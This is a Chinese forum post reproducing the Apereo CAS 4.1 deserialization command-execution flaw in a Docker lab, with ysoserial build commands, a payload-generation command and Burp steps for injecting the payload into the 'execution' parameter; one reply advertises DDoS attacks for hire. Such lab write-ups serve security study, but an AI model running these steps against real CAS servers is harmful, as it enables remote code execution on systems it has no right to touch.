登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
业界
›
Apereo CAS 4.1 反序列化命令执行漏洞 (复现) ...
Apereo CAS 4.1 反序列化命令执行漏洞 (复现)
[ 复制链接 ]
院儿饯
2025-7-28 18:10:38
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
此漏洞需要用到工具Apereo-CAS-Attack,工具地址:https://github.com/vulhub/Apereo-CAS-Attack
还需要下载结合https://github.com/frohoff/ysoserial的CommonsCollections4链生成 Payload
上述工具下载完成后将ysoserial放在工具的根目录里
在根目录下打开终端执行以下命令将 jar 包安装到本地 Maven 仓库
点击查看代码
mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file \
-Dfile=ysoserial-all.jar \
-DgroupId=ysoserial \
-DartifactId=ysoserial \
-Dversion=0.0.6 \
-Dpackaging=jar \
-DlocalRepositoryPath=my-repo
复制代码
命令成功执行!!!
ysoserial会被安装到项目根目录的my-repo文件夹中,供 Maven 构建时引用
执行以下命令安装项目所需环境
点击查看代码
# 更新包列表
sudo apt update
# 安装OpenJDK 8
sudo apt install openjdk-8-jdk -y
# 同样配置javac(编译器)
sudo update-alternatives --config javac
# 选择OpenJDK 8对应的javac路径
#执行以下代码
javac -version
若返回类似javac 1.8.0_xxx,说明 JDK 安装成功
复制代码
执行代码mvn clean package assembly:single -DskipTests构建项目
执行成功示图如上,接下来就可以使用该工具生成payload了
漏洞目录终端下执行docker compose up -d开启容器访问ip:8080
生成恶意 Payload
利用漏洞工具Apereo-CAS-Attack(集成了默认密钥和序列化逻辑)生成加密后的恶意序列化数据
java -jar target/apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/cas_exploit_success"
生成 Payload(利用反序列化执行 touch /tmp/cas_exploit_success)
工具会输出一段 Base64 编码的长字符串;
接下来请出bp(burpsuite)抓包
网站首页使用测试账密test/test,输入后不要登陆!!!
回到bp点击proxy启动代理(浏览器也需要挂上bp的代理),点击登录开始抓包
鼠标右键点击那条POST命令send to repeater,切换到repeater界面
将第一步生成的Base64编码替换成execution参数的内容
点击Send,收到状态码500,不确定漏洞复现没,验证一下
java -jar target/apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/cas_exploit_success"
此命令是在服务器的/tmp目录下创建文件,只需要访问服务器这个位置查看是否成功创建文件即可验证是否成功
文件创建成功,该漏洞成功复现!!!
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
Apereo
CAS
序列化
命令
执行
相关帖子
windows常见命令
一条SQL在MySQL的执行过程?、MyISAM和InnoDB的区别?
工作中实战sql命令集合
Linux命令自检
具身智能——机械臂全解析:从技术原理到产业生态,解锁智能执行新范式
Linux常用命令查询工具(好记性不如烂笔头)
大疆不同任务类型执行逻辑,上云API源码分析
pgAdmin 后台命令执行漏洞复现及分析(CVE-2025-2945)
JS逆向-反调试分析&debuger执行&条件断点&替换文件执行
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
安全
windows常见命令
8
847
济曝喊
2025-11-25
业界
一条SQL在MySQL的执行过程?、MyISAM和InnoDB的区别?
2
980
倡遍竽
2025-11-29
安全
工作中实战sql命令集合
1
584
呵桢
2025-12-03
安全
Linux命令自检
3
383
椎蕊
2025-12-07
业界
具身智能——机械臂全解析:从技术原理到产业生态,解锁智能执行新范式
1
37
届表
2025-12-08
安全
Linux常用命令查询工具(好记性不如烂笔头)
1
603
闾丘婉奕
2025-12-12
业界
大疆不同任务类型执行逻辑,上云API源码分析
0
80
迭婵椟
2025-12-12
安全
pgAdmin 后台命令执行漏洞复现及分析(CVE-2025-2945)
0
239
赘暨逢
2025-12-17
业界
JS逆向-反调试分析&debuger执行&条件断点&替换文件执行
0
725
殳世英
2025-12-18
回复
(5)
睿哝
2025-10-31 01:42:49
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
感谢分享
宁觅波
2025-11-5 13:19:19
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
不错,里面软件多更新就更好了
章海
2025-12-9 21:55:56
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
收藏一下 不知道什么时候能用到
龙玮奇
2025-12-12 06:46:31
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
不错,里面软件多更新就更好了
勺缓曜
7 天前
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
过来提前占个楼
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
安全
代码
签约作者
程序园优秀签约作者
发帖
院儿饯
7 天前
关注
0
粉丝关注
16
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991124
anyue1937
9994891
kk14977
6845357
4
xiangqian
638210
5
韶又彤
9997
6
宋子
9982
7
闰咄阅
9993
8
刎唇
9993
9
俞瑛瑶
9998
10
蓬森莉
9951
查看更多
今日好文热榜
87
掌握相关性分析:读懂数据间的“悄悄话”
131
嵌入式UI框架-抗锯齿画圆弧算法
930
嵌入式UI框架的渐变原理、渐变算法
214
日本股票 API 对接实战指南(实时行情与 IP
557
解决Docker磁盘空间告急:认识并清理“悬空
393
别再只会算直线距离了!用“马氏距离”揪出
523
企业进行信息化后,一定会提高效率吗?真相
511
n8n整合ffmpeg
490
从random随机数看验证码重复数字
523
OceanBase 向量索引优化指南
232
Vue2中能否实现输入中文自动转化为拼音, 且
752
从项目成果到职业晋升:项目经理年终总结的
452
JS逆向-混淆加密-识别&还原-Eval&JSFuck&JS
936
2025年上海防水补漏谁家强?长三角标杆企业
610
正式接入DeepSeek-V3.2,国产AI“双剑合壁
397
守嘉陪诊师培训报名热潮引关注 独家实习机
911
顺序表实现线性结构
73
吴恩达深度学习课程四:计算机视觉 第二周
256
设计模式简述
193
vue 甘特图 vxe-gantt table 连接线的用法